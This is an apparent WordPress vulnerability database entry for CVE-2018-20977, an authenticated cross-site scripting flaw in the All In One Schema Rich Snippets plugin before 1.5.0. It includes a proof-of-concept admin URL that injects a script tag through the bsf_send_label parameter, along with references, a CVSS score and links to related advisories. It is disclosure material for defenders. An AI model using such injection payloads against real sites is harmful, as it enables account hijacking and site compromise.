All In One Schema.org Rich Snippets < 1.5.0 – Authenticated Cross-Site Scripting (XSS) | CVE 2018-20977

Description

The Schema – All In One Schema Rich Snippets WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://vulnerablesite.com/wp-admin/admin.php?page=rich_snippet_dashboard&bsf_force_send=true&bsf_send_label=<%2Fscript><script>alert(1)<%2Fscript>

Affects Plugins

all-in-one-schemaorg-rich-snippets

Fixed in 1.5.0

References

CVE

CVE-2018-20977

URL

https://www.defensecode.com/advisories/DC-2017-01-002_WordPress_All_In_One_Schemaorg_Rich_Snippets_Plugin_Advisory.pdf

URL

https://seclists.org/fulldisclosure/2017/May/97

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.1 (medium)

Miscellaneous

Submitter

Neven Biruski

Submitter website

http://www.defensecode.com

Submitter twitter

DefenseCode

Verified

WPVDB ID

8d185b98-d322-4550-bb80-3dae22307d88

Timeline

Publicly Published

2017-05-24 (about 8 years ago)

Added

2017-05-26 (about 8 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2018-11-02

Title

Event Calendar WD <= 1.1.21 - Cross-Site Scripting (XSS)

Published

2024-07-08

Title

Unlimited Elements For Elementor (Free Widgets, Addons, Templates) < 1.5.113 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'username'

Published

2022-08-22

Title

WBW Currency Switcher for WooCommerce < 1.6.6 - Admin+ Stored XSS

Published

2014-06-12

Title

WP Guestmap <= 1.8 - Multiple XSS

Published

2025-12-18

Title

Colibri Page Builder < 1.0.358 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode